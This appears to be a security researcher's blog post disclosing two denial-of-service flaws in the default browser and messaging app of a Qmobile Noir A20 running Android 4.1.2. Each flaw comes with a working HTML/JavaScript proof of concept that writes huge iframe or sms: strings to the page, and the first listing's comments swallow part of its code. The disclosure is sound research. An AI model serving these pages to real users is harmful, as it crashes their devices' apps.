Android Browser + Messaging App DOS
While being impressed by Collin Mulliner's research on smart phones, I found myself very curious trying to find vulnerabilities inside it and i found several ones out. In this short blog post I would be discussing about DOS vulnerabilities inside the default browser and the messaging app of Qmobile Noir A20. Qmobile Noir A20 runs on Android 4.1.2. The flaw itself is present it inside pre kitkat browsers as well as the default messaging system, however since most of the Qmobile smartphones within the released with or slightly after Noir A20 are most likely using the same browser version and messaging app.
Android Browser DOS
The vulnerability is a simply Denial of service issue due to the writing overly long strings of iframes to the DOM.Here is the POC:
<html>
<head>
<title>Android Browser DOS</title>
<body>
<script>
frame = "<iframe src=\"test:";
for (i = 0; i < 100000; i++) {
frame = frame + "0000000000000000000000000000000000"; // Long string of Numbers }
frame = frame + "\" width=125 height=125></iframe>"; // Appending the resultant of the loop to closing tag. document.write(frame); // Writing the value of frame to DOM
</script>
</body>
</html>
Messaging App DOS
A sms protocol provides text messaging component for all smartphones, During my tests, I concluded that the default messaging app for Qmobile Noir A20 is not able to handle long strings sent via sms:// protocol. Please note that this is partly recoverable DOS, and also the exact conditions for DOS are not yet known.Here is the POC:
<html>
<title>Android Browser SMS Protocol Denial Of Service</title>
<body>
<script>
frame = "<iframe src=\"sms:";
for (i = 0; i < 30000; i++) {
frame = frame + "+12345678912222222222222";
}
frame = frame + "\" </iframe><iframe src='sms:+1234567891212121222222222'></iframe>";
document.write(frame);
</script>
</body>
</html>
References
- http://mulliner.org/security/advisories/iphone_safari_phone-auto-dial_vulnerability_advisory.txt
- https://www.ietf.org/rfc/rfc5724.txt